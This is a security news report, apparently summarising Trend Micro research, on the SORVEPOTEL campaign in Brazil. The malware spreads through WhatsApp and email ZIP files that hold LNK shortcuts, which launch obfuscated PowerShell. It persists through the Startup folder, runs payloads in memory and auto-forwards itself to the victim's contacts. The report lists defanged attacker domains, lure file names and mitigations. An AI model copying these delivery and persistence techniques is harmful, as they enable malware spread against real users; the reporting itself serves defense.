An aggressive malware campaign dubbed SORVEPOTEL is exploiting WhatsApp messages to infiltrate Windows systems, with its epicenter in Brazil.
Rather than pursuing data theft or ransomware extortion, this self-propagating malware is engineered for rapid spread, leveraging social trust and automation to reach new victims.
Trend Research telemetry shows that 457 of the 477 detected infections originate in Brazil, primarily within government and public service organizations, but also affecting the manufacturing, technology, education, and construction sectors.
The attack begins when a user receives a phishing message on WhatsApp from a compromised contact, often appearing as a colleague or friend.
These messages in Portuguese include a ZIP archive named to resemble legitimate documents—examples include “RES-20250930_112057.zip,” “ORCAMENTO_114418.zip,” or health-app receipts—urging the recipient to “baixa o zip no PC e abre” (download the ZIP on PC and open it).
Evidence suggests that email is an alternate vector, with phishing emails distributing ZIP attachments named like “COMPROVANTE_20251001_094031.zip” or “ComprovanteSantander-75319981.682657420.zip,” sent from seemingly legitimate sender addresses and subjects such as “Documento de Rafael B” or “Extrato.”
Inside the ZIP resides a Windows shortcut (.LNK) file that, when executed, surreptitiously launches a PowerShell or command-line script.
This script downloads the primary payload from attacker-controlled domains—typo-squatted URLs such as sorvetenopoate[.]com, expahnsiveuser[.]com, and sorvetenopotel[.]com—which serve as API endpoints for delivering the malicious components.
By masquerading as harmless shortcuts, these LNK files evade basic antivirus detection, enabling the campaign to maintain a foothold.
Persistence and Payload Execution
The downloaded payload is typically a batch (.BAT) script that secures persistence by copying itself into the Windows Startup folder, ensuring execution on every boot.
This script assembles and executes an obfuscated PowerShell command in hidden mode, utilizing Base64 encoding for its parameters.
Once decoded, the script reaches out to multiple command-and-control (C&C) servers, downloading and executing additional in-memory payloads via Invoke-Expression, while avoiding disk writes and reducing forensic traces.
Trend Research analysis highlighted the malware maintains continuous communication with its C&C infrastructure, allowing threat actors to update instructions or deploy secondary modules.
Despite the sophistication of its delivery and persistence techniques, current campaign activity reveals no evidence of data exfiltration or file encryption; the emphasis remains squarely on self-propagation rather than deeper system compromise.
A hallmark of SORVEPOTEL is its ability to detect active WhatsApp Web sessions on infected machines. Upon identifying an authenticated session, the malware automatically redistributes the same malicious ZIP file to all contacts and groups in the victim’s address book.
This automated forwarding mechanism drives exponential spread, inundating targets with spam and frequently resulting in compromised accounts being suspended or banned for violating WhatsApp’s terms of service.
Threat actors behind SORVEPOTEL exploit obfuscation at multiple levels—using typo-squatted domains that mimic the innocuous phrase “sorvete no pote” (ice cream in a cup) and embedding commands with encryption and encoding.
Additional infrastructure, including domains like cliente[.]rte[.]com[.]br, has been leveraged for malware distribution, indicating ongoing adaptation and diversification of delivery channels.
Mitigations
The SORVEPOTEL campaign underscores how popular messaging platforms can serve as force multipliers for malware distribution.
Rapid self-propagation with minimal user action illustrates the evolving landscape of social engineering combined with automation.
Organizations should enforce robust phishing defenses, disable automatic execution of LNK files where possible, and monitor for anomalous WhatsApp Web session behaviors.
While the current scope focuses on widespread infection and account bans rather than destructive payloads, parallels with prior Brazilian campaigns targeting financial data suggest potential for future escalation.
User awareness training is critical—employees must be cautious when opening attachments received via messaging apps.
Trend Micro continues to track SORVEPOTEL closely and advises maintaining updated endpoint security solutions, applying least-privilege principles, and staying vigilant against emerging techniques targeting messaging platforms.
Follow us on Google News, LinkedIn, and X to Get Instant Updates and Set GBH as a Preferred Source in Google.
